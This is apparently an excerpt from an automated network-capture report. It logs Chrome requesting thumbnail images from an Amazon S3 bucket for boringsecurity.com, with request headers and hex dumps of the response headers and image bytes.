                                                                          2023-12-10 16:45:03 UTC377INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 4a 56 42 33 36 49 78 6e 6e 7a 5a 65 56 6a 7a 2b 35 67 4c 5a 62 2b 45 6f 67 36 73 2b 74 72 62 34 4d 42 47 73 72 31 4c 44 4a 38 2b 61 54 7a 35 73 72 48 65 33 77 51 76 46 65 44 52 6f 4c 64 64 50 6d 70 4e 54 6e 30 65 58 4b 2b 6b 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 46 59 34 4e 33 4e 48 42 57 45 4a 31 44 46 30 53 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 33 20 53 65 70 20 32 30 32 32 20 30 30 3a 30 36 3a 34 37 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 35 65 34 64 34 31 63 32 30 66 61 65 61 36 66 61 65 34 62 35 32 65
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: JVB36IxnnzZeVjz+5gLZb+Eog6s+trb4MBGsr1LDJ8+aTz5srHe3wQvFeDRoLddPmpNTn0eXK+k=x-amz-request-id: FY4N3NHBWEJ1DF0SDate: Sun, 10 Dec 2023 16:45:04 GMTLast-Modified: Fri, 23 Sep 2022 00:06:47 GMTETag: "5e4d41c20faea6fae4b52e
                                                                          2023-12-10 16:45:03 UTC8532INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec 9d 77 5c d3 e7 da ff 3d a7 e7 f4 b4 a7 c7 0e ed 50 ab a2 d6 3d 10 10 90 bd f7 26 ac 00 09 7b 8f 04 c2 de 7b ef 21 28 0e 54 10 f7 9e b5 5a b5 d5 da d6 5d ab dd 7b d8 65 1d 09 09 01 72 5d bf d7 75 43 30 52 7b 9e 3e cf 73 9e 9f 50 f9 e3 7e 05 21 04 f3 fd be f3 b9 e6 7d dd e3 5c ec dd 1f cb c9 2b 1c e7 57 1b f3 cf f8 30 61 9a 20 58 f8 be 80 2f ec 17 f2 85 7d 02 be b0 8f 1e c7 d6 d8 35 10 fe c1 6b 20 50 79 14 04 0b af c5 85 0b d3 f9 05 51 ff cc 49 cd 1f e7 6e ef f1 d8 b8 ec e2 a2 71 b1 19 09 33 05 c1 09 ef 09 78 42 14 f2 12 68 81 60 e0 11 e9 71 6c 8d 5d 03 c1 1f bc 06
                                                                          Data Ascii: PNGIHDRMpHYs IDATxw\=P=&{{!(TZ]{er]uC0R{>sP~!}\+W0a X/}5k PyQInq3xBh`ql]
                                                                          2023-12-10 16:45:03 UTC9000INData Raw: d8 f4 9d d9 59 29 27 a5 22 1f 4e f9 69 27 e0 ae 1d 6b c5 92 94 00 16 c1 29 53 1a c3 5a 88 d8 f7 6e 9c db 88 fe 1e 76 90 9f 5f 34 b4 eb 8a 16 e5 e0 68 53 72 50 60 10 72 b9 7e 72 6d ad a5 e2 9a ec d0 be 8f 5e 5f 89 14 b5 52 8d 93 72 7e 37 2f 6f 81 e3 9b 4b 7b ea 72 c3 ef 64 c4 78 75 a7 46 72 ee 88 c2 dc 6e 45 f8 d9 c9 e2 02 9d a4 49 e1 ee 3d b9 42 6e 7f 7d 5e 24 6e ac 4b 86 43 1b 0a f1 f8 e6 72 b8 70 b0 19 3e 3f bd 1e 7e b9 b2 15 af 1f 5f 05 b9 09 fe 68 a2 3d 1b 3a 0b dc e0 fd 03 a5 f0 f5 5b 6b f1 c3 d7 57 e2 f9 03 f5 40 b9 b5 8e ba a4 7e 61 28 47 6e 6d ac 25 79 67 6f 5d 0f 99 ce c1 c8 79 40 cd a8 5a 71 7c 25 e6 25 f8 31 25 a6 9a ef 9a 8a 78 6a 6c 80 15 cd 2b 20 27 3b 1b d5 17 aa 53 b0 d0 a7 1c 84 33 d6 9e f4 3b c0 d1 85 11 05 26 29 4c 74 4d c4 a9 69 a9 d8
                                                                          Data Ascii: Y)'"Ni'k)SZnv_4hSrP`r~rm^_Rr~7/oK{rdxuFrnEI=Bn}^$nKCrp>?~_h=:[kW@~a(Gnm%ygo]y@Zq|%%1%xjl+ ';S3;&)LtMi
                                                                          2023-12-10 16:45:03 UTC5805INData Raw: af d2 b1 1f 04 5e f5 28 49 78 d8 d7 68 0c b8 ff 10 68 aa ca 30 b8 79 06 43 39 61 b2 79 b3 e6 89 e7 cc 9d 0d 4b 16 2f b9 9b 9c 94 ac 50 d9 6d ff 87 15 ee f7 26 64 aa 04 16 fd 33 66 cc 90 4d 7c 7e 22 cc 7b 65 7e b7 bb 25 47 42 e6 75 70 08 f4 7d 07 d6 09 1e 41 f0 fe 54 0a f7 20 7f 8d 76 6a d1 4d 9f f6 f2 34 d9 e2 25 8b 71 e9 d2 a5 fd 06 06 06 12 3a 49 e6 de 29 81 ff 7d 85 7b 10 74 04 6f 5d 6d 9d c2 d8 d8 58 3c f5 e5 a9 a8 a9 a9 89 6a 33 d4 7a 17 ce 59 24 e6 da 73 e9 7c 09 48 0c 64 07 79 e0 68 f7 c5 1e 79 e0 94 80 29 4d 28 b5 91 93 b2 18 2f 33 11 4f 9d 3a b5 77 d9 b2 65 48 6b da b4 69 b2 e0 a0 e0 5e 55 73 fa 9f 00 4e 75 06 70 44 78 84 74 c2 84 09 bd 1a 1a 9a b8 7c f9 72 5c b4 78 11 4e 9f 3e bd 57 6b 91 96 24 c4 3d 44 36 12 0f ce 15 8e 01 f7 3f 53 35 e5 39 0c
                                                                          Data Ascii: ^(Ixhh0yC9ayK/Pm&d3fM|~"{e~%GBup}AT vjM4%q:I)}{to]mX<j3zY$s|Hdyhy)M(/3O:weHki^UsNupDxt|r\xN>Wk$=D6?S59


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          208192.168.2.5499403.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:03 UTC642OUTGET /thumbnail_5_F_Ry_lya_400x400_c386fc238e.jpeg HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:03 UTC409INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 6d 6f 76 5a 4d 71 46 6b 61 72 2b 69 5a 6b 67 38 6f 65 35 53 46 7a 71 53 55 35 33 30 58 76 5a 4b 5a 67 56 4f 76 62 55 51 52 65 31 73 61 4e 70 61 62 51 47 62 42 47 64 6d 4a 35 61 7a 70 56 49 32 63 71 78 50 33 76 63 37 42 51 4a 52 71 32 53 41 78 58 36 77 74 59 71 46 79 4e 48 2b 6b 41 53 6b 6d 45 59 63 59 4e 69 65 69 56 67 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 46 59 34 50 33 35 37 37 39 4a 30 4e 33 39 45 50 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 33 20 53 65 70 20 32 30 32 32 20 30 30 3a 31 36 3a 35 31 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: movZMqFkar+iZkg8oe5SFzqSU530XvZKZgVOvbUQRe1saNpabQGbBGdmJ5azpVI2cqxP3vc7BQJRq2SAxX6wtYqFyNH+kASkmEYcYNieiVg=x-amz-request-id: FY4P35779J0N39EPDate: Sun, 10 Dec 2023 16:45:04 GMTLast-Modified: Fri, 23 Sep 2022 00:16:51 GM
                                                                          2023-12-10 16:45:03 UTC6407INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 9c 00 9c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 05 06 03 04 07 02 01 08 00 ff c4 00 3c 10 00 02 01 03 03 01 06 03 06 05 03 04 03 01 00 00 01 02 03 00 04 11 05 12 21 31 06 13 22 41 51 61 71 81 91 07 14 32 a1 b1 c1 23 42 52 d1 f0 15 24 e1 16 33 43 62 08 82 92 f1 ff c4 00 1a
                                                                          Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("<!1"AQaq2#BR$3Cb


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          209192.168.2.54994352.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:03 UTC417OUTGET /thumbnail_916389a9b9dff2fff021cf2a62264925_537b20d36d.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:03 UTC377INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 5a 69 66 43 53 56 53 39 67 72 6f 38 6c 39 52 64 77 42 33 31 6b 72 47 69 75 42 46 35 6b 38 55 78 33 74 6b 42 6d 59 4f 61 5a 76 52 51 75 7a 41 37 30 48 45 74 65 61 54 48 31 34 4e 71 4a 4f 45 51 46 36 65 4d 44 64 37 2b 55 30 45 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 46 59 34 4b 47 38 36 56 39 56 51 4b 36 39 4e 51 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 33 20 53 65 70 20 32 30 32 32 20 30 30 3a 30 35 3a 35 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 64 66 36 35 35 66 62 37 36 36 39 34 36 33 31 64 32 65 32 37 66 33
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: ZifCSVS9gro8l9RdwB31krGiuBF5k8Ux3tkBmYOaZvRQuzA70HEteaTH14NqJOEQF6eMDd7+U0E=x-amz-request-id: FY4KG86V9VQK69NQDate: Sun, 10 Dec 2023 16:45:04 GMTLast-Modified: Fri, 23 Sep 2022 00:05:58 GMTETag: "df655fb76694631d2e27f3
                                                                          2023-12-10 16:45:03 UTC8532INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 02 00 00 00 05 da 55 1a 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 7d 05 54 54 dd f7 f6 a5 43 c2 40 14 11 0c 14 14 13 bb bb bb bb 13 15 5b b0 e8 0e 11 a5 41 1a 86 2e c5 6e 41 41 54 ba bb bb 9b 61 66 ee f9 d6 be 17 e7 45 44 a5 c5 df f7 9f 75 96 4b 11 86 3b e7 39 bb 9f bd 0f 86 dc e3 ff 6f a1 ff ad 4d c0 90 73 ec ff 2d f4 bf b5 09 18 72 89 fd bf 85 fe b7 36 e1 ff 40 8d fd eb 18 fc 1f a8 7f 7f cb 50 9f 5f ff 27 a9 b1 7f 1d 83 ff 03 f5 97 5b 80 3b c7 c0 72 f9 fb 7b fa d7 d7 bf 2d a9 0c e7 18 9a 53 14 c3 39 06 fe e9 1a 8f 5c 13 10 25 0e 77 8e a1 3b 45 e1 e4 17 ff bf 5c ff 2a a8 34 c7 28 aa 43 04 72 4b 44 de 19 c8 35 a1 c9 31 b2 cc f2
                                                                          Data Ascii: PNGIHDRUpHYs IDATx}TTC@[A.nAATafEDuK;9oMs-r6@P_'[;r{-S9\%w;E\*4(CrKD51
                                                                          2023-12-10 16:45:03 UTC9000INData Raw: 56 46 a6 0f df 9b 7b a1 af 45 f4 f7 bf d5 c0 41 19 f4 17 c9 c8 27 e3 ed 6d 07 08 10 a4 27 50 1b e1 b8 6b 12 e2 7e 76 e5 1e e4 9f db 87 42 9a 9f 79 87 f2 1b 61 72 ce f6 6d db 48 95 4b 06 27 cb 97 37 cf 05 94 93 73 7c f1 02 79 79 d1 3d 3c e8 14 4a bd 93 53 95 a3 63 a5 a3 63 a5 93 53 95 8b 0b 24 f7 bd bd d1 ed db 4f a0 42 27 2d d9 94 1f 81 4a 88 9d 2d 8e 9e 35 0d 52 1c 2f 5e bc 40 08 05 05 7d 04 65 28 21 65 dd 0e 3b 6a f5 1d d1 fb 31 48 c5 9f ae f5 0c 9d 32 0c 01 be c1 f8 f1 a4 07 57 57 57 27 26 06 64 94 c8 77 de a8 26 19 f4 6d 0b 50 51 71 34 28 e4 c6 f4 73 27 c0 43 be 75 0b 02 21 52 03 1d 3b 7a 94 e0 42 1f 42 11 e5 b4 77 29 bf 44 f4 63 26 7a 9e 42 77 8c 44 be 59 7a 07 14 30 0c db b3 7b 0f 79 32 ae 5e 81 61 a9 b7 b6 9c ea 5b 71 2a 73 35 4f a9 70 4d 58 4a f4
                                                                          Data Ascii: VF{EA'm'Pk~vByarmHK'7s|yy=<JSccS$OB'-J-5R/^@}e(!e;j1H2WWW'&dw&mPQq4(s'Cu!R;zBBw)Dc&zBwDYz0{y2^a[q*s5OpMXJ
                                                                          2023-12-10 16:45:03 UTC1984INData Raw: d9 61 57 3a 67 5f 80 fa 5b ad bd 65 fd f8 66 6e 62 8b 30 01 de ad 10 ba 31 51 1d b1 4b c4 62 54 69 23 9a c1 e1 5d 32 18 86 1d 5d b2 15 79 a5 75 b1 54 de a9 d2 9b 5f f6 ad ad 70 dd c8 cc a9 c3 eb b3 95 20 24 af d2 66 e4 ab 26 07 5f f0 b5 db ad 2e bf 74 df d6 49 0b 66 89 4f 90 12 1e 25 de 7f b8 88 c0 70 11 81 51 e2 03 26 8e 13 5e 30 4b 7c ef 96 49 ca 57 16 bb 5b ee 88 78 2d 5b 4f 24 4e 51 95 36 5e 08 e5 62 6a b6 12 fe db ca 79 61 ac 02 99 c9 fb f2 e2 14 aa ea 6a 0f 1d 83 e0 e8 a6 7d be d8 af 1f 07 17 17 57 64 70 28 aa 6b 44 8d b4 c0 17 af c8 3c 68 49 67 39 85 a4 06 26 95 ca d1 3d 32 4c 1f 18 3e 5d 85 56 6d fa ed cf 4f 4e d8 19 6d be 79 61 e1 89 7d d3 0e ee 98 72 ee e8 cc cb a7 e7 92 04 d5 4f 5a 5e e8 51 7e a3 7d 78 57 58 fc 9d 2a 92 bb 25 e6 5b 7c 1c 31 18
                                                                          Data Ascii: aW:g_[efnb01QKbTi#]2]yuT_p $f&_.tIfO%pQ&^0K|IW[x-[O$NQ6^bjyaj}Wdp(kD<hIg9&=2L>]VmONmya}rOZ^Q~}xWX*%[|1


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          210192.168.2.5499423.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:03 UTC628OUTGET /thumbnail_toven_0ba71c0c46.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:03 UTC447INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 78 37 53 5a 56 2f 62 55 74 59 4b 61 4a 76 49 34 71 31 73 38 4e 2b 4c 64 6c 68 61 65 2b 75 79 36 2b 68 73 62 45 70 61 64 64 32 66 57 5a 65 55 51 48 4a 6a 50 67 7a 37 34 48 4d 57 5a 4e 79 66 68 6f 49 2b 54 6e 55 39 4e 65 78 51 7a 57 56 57 6e 46 39 53 6a 2b 51 6f 7a 2b 30 4b 6a 35 6b 6d 59 4e 56 38 79 4a 49 77 51 53 5a 73 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 46 59 34 4d 44 4e 59 4a 44 4e 48 38 35 38 46 48 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 61 74 2c 20 32 35 20 4e 6f 76 20 32 30 32 33 20 30 37 3a 33 35 3a 35 33 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: x7SZV/bUtYKaJvI4q1s8N+Ldlhae+uy6+hsbEpadd2fWZeUQHJjPgz74HMWZNyfhoI+TnU9NexQzWVWnF9Sj+Qoz+0Kj5kmYNV8yJIwQSZs=x-amz-request-id: FY4MDNYJDNH858FHDate: Sun, 10 Dec 2023 16:45:04 GMTLast-Modified: Sat, 25 Nov 2023 07:35:53 GM
                                                                          2023-12-10 16:45:03 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9f 00 00 00 9c 08 06 00 00 00 61 8f 79 4e 00 00 00 09 70 48 59 73 00 00 1d 87 00 00 1d 87 01 8f e5 f1 65 00 00 20 00 49 44 41 54 78 9c ec 9d 05 9c 55 d5 de f7 7d 9f f7 b9 cf 7d ee 55 69 98 19 98 6e a6 bb 93 ee b4 0b 05 15 09 01 01 31 b0 30 10 3b ae 08 b6 82 48 77 09 48 0d 35 dd 1d 4c 77 32 dd df f7 b3 f6 39 7b 4e 4c 00 32 5c bd f7 be 47 d7 67 ef b3 39 73 ce de 6b fd d6 ef 9f eb bf ee 58 b1 af 90 e5 7b 0b 11 c7 ff f4 b6 7c 6f 41 d7 51 3e ef 8f ef 54 7d 97 38 ff e3 9f 73 c5 1f d5 d4 fa e2 99 1f e3 b9 43 d1 41 7f 82 1b fb 13 81 ec 39 d1 f6 6b b5 5e 40 a5 fd 1d f2 df ae d4 fa db e7 ae 73 1f 2b fe 43 fa 5d c6 da 82 af 42 ff 33 c0 d7 1b d8 d4 41 26 de 2f db 5b c0 d2 3d 05 2c da 95 cf c2 9d 9a ed 99 9d f9
                                                                          Data Ascii: PNGIHDRayNpHYse IDATxU}}Uin10;HwH5Lw29{NL2\Gg9skX{|oAQ>T}8sCA9k^@s+C]B3A&/[=,
                                                                          2023-12-10 16:45:03 UTC577INData Raw: 8a b5 85 03 a3 2d 1d b0 30 1d 2d e9 7e 0e b6 ce 78 09 66 f3 0d c4 cf c7 1f 2f 4f 5f 3c 5c bd f1 74 f7 c1 cf 2b 90 00 9f 31 78 b9 f9 10 e8 1d cc 84 a0 c9 4c 19 37 9d 19 53 66 33 7b ba 00 e0 6c 66 4c 99 c5 8c a9 33 99 32 71 17 45 d8 cb 00 00 20 00 49 44 41 54 2a 63 fd 27 12 e4 36 9e 00 9f b1 e8 0c d6 63 ee b4 b9 3c f9 e8 02 ce 5c 0e 61 fd c7 1f 50 5e a1 5a 55 28 bf 3a 6e 00 7c f2 f5 af fb 35 bc 56 70 53 e1 b5 4e f5 5d 8a 34 c0 a7 b4 38 c5 3f 88 bd 14 e4 2f ea f9 41 a4 33 36 9e 2f b9 a1 c4 82 1b 12 bd 7d 24 16 68 77 6c 47 7b 3d 25 45 ef 53 51 b6 96 d0 8b 0b 08 74 b7 c5 ce d8 02 0f 3b 73 8e 1d 7c 18 0f 3b 0b 9e 78 d0 5b aa 40 60 30 74 24 96 06 26 38 5b 3a e0 e3 e0 27 59 bd a3 74 0c 70 b5 71 c5 d1 c2 5e 12 b9 12 e3 fd 7d 90 04 c0 21 77 0e 92 16 1d f9 39 7a b0
                                                                          Data Ascii: -0-~xf/O_<\t+1xL7Sf3{lfL32qE IDAT*c'6c<\aP^ZU(:n|5VpSN]48?/A36/}$hwlG{=%ESQt;s|;x[@`0t$&8[:'Ytpq^}!w9z
                                                                          2023-12-10 16:45:03 UTC9501INData Raw: cb 17 6f 4f 5f a6 4c 98 ca 9c 59 73 99 3b f7 5e 66 cd 9c c5 ec d9 f7 30 ce 7f 0a 63 7c c6 63 65 6c c5 f0 01 23 70 1e ed cc 93 8f 2d 60 d1 bc 85 0a bf 9e 32 83 45 1e 07 61 74 b4 b4 b7 d3 da 4b ad bc 3f 43 4a 55 a7 ba 9d d0 dc 2e b9 f2 c4 ef 6b e5 f3 a9 06 ff d7 e4 da 1b 4b 26 8d eb 3b 99 f4 f7 ea 0f 3d 25 93 aa 8b 5c 49 df cb 7b 81 aa 8a 17 78 79 d5 18 6c 8d 2c 24 4b d7 c4 60 28 b6 a3 47 a0 37 78 28 26 a3 86 33 fc ee 41 0c 1b 30 90 61 03 07 31 f8 ee 01 e8 0e 1d 86 89 9e 3e 56 06 46 38 59 5a e1 36 da 1e a3 11 7a 52 a5 aa e1 03 86 31 f4 ae 21 98 ea 99 62 2c 2a 1c 0c d5 23 d0 d9 53 62 bf dc 53 fb a9 89 0d 85 9c 34 92 4f ff ca b4 89 13 30 d2 1d 85 85 ae 29 2e 66 ce 78 39 f8 e0 e9 ea 87 9b a3 b7 64 f5 da 5a 0b 91 6c 85 b5 95 2d 4e 82 0d dd 7d 98 30 66 02 93 26
                                                                          Data Ascii: oO_LYs;^f0c|cel#p-`2EatK?CJU.kK&;=%\I{xyl,$K`(G7x(&3A0a1>VF8YZ6zR1!b,*#SbS4O0).fx9dZl-N}0f&
                                                                          2023-12-10 16:45:03 UTC6386INData Raw: 5d 16 6f bd f5 16 87 da 9d 3b 77 62 c7 f6 ed d8 bc 79 33 d6 ae 5d 8b bf fd ed 6f 78 f7 dd 77 f0 c2 0b cf e3 a1 55 0f e2 b7 2b 57 62 f9 dd 77 a2 bd b5 15 75 d9 2e 2e 3a fa e6 9f 09 8f e4 c6 f0 11 c7 70 ef 57 97 5b c8 60 ea 71 58 11 f2 4b 08 fa bd b0 db 6a d8 55 2d 98 0d 68 ed bf 02 8b 57 ed c2 7c d6 fc 0e fe fd a1 f7 85 22 13 3d 2e cc 58 39 88 f7 46 07 de 2b 03 9f 73 5a 35 f8 3d ff ce c1 37 d4 13 25 00 ae 7c 23 5f 80 1c 02 00 e9 fe 37 2f 6d c2 2b 6f 9f 89 4d 03 73 b0 65 53 3f a6 f4 d6 a2 a6 d2 08 51 b0 73 c1 c0 1a 5f 69 4f 97 00 e7 d3 9c c5 45 f0 69 ba 1f eb 7d 41 72 a6 78 34 d6 a3 7e ae 28 e0 e9 a7 9e d4 00 ff d5 6e 4c 9e 38 09 2e bb 8d c1 97 8c c4 91 0c a7 d9 c6 5e 69 18 06 d9 47 4c e7 84 d5 66 81 c7 e3 61 f0 91 e4 e2 b0 db d0 d5 d9 c1 8b f8 78 ff ed 9e
                                                                          Data Ascii: ]o;wby3]oxwU+Wbwu..:pW[`qXKjU-hW|"=.X9F+sZ5=7%|#_7/m+oMseS?Qs_iOEi}Arx4~(nL8.^iGLfax


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          211192.168.2.5499443.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:03 UTC638OUTGET /thumbnail_Lazy_Lions_118_4a741f9816.jpeg HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:03 UTC409INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 67 6f 49 57 72 79 74 73 36 68 31 6d 43 33 69 77 36 44 4f 4e 46 71 6c 47 6d 51 58 67 34 61 71 57 75 6f 37 65 2f 41 33 48 52 48 33 31 53 7a 66 36 59 63 53 4b 65 36 68 30 75 50 53 69 56 6e 6a 59 2f 75 72 68 72 74 48 4a 7a 68 53 54 79 61 69 39 6b 32 57 46 77 5a 4d 74 69 50 64 61 55 4e 66 6a 70 5a 72 67 66 2b 56 44 53 7a 4d 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 46 59 34 54 30 33 57 36 50 48 54 38 45 54 36 37 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 33 20 53 65 70 20 32 30 32 32 20 30 30 3a 30 33 3a 34 31 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: goIWryts6h1mC3iw6DONFqlGmQXg4aqWuo7e/A3HRH31Szf6YcSKe6h0uPSiVnjY/urhrtHJzhSTyai9k2WFwZMtiPdaUNfjpZrgf+VDSzM=x-amz-request-id: FY4T03W6PHT8ET67Date: Sun, 10 Dec 2023 16:45:04 GMTLast-Modified: Fri, 23 Sep 2022 00:03:41 GM
                                                                          2023-12-10 16:45:03 UTC1548INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 9c 00 9c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 03 04 05 07 08 01 02 09 ff c4 00 41 10 00 01 03 03 02 03 05 05 05 06 05 03 05 00 00 00 01 02 03 04 00 05 11 06 12 21 31 41 07 13 22 51 61 14 32 71 81 a1 23 42 52 72 91 08 15 62 92 b1 c1 24 33 43 82 e1 16 73 d1 34 53 a2
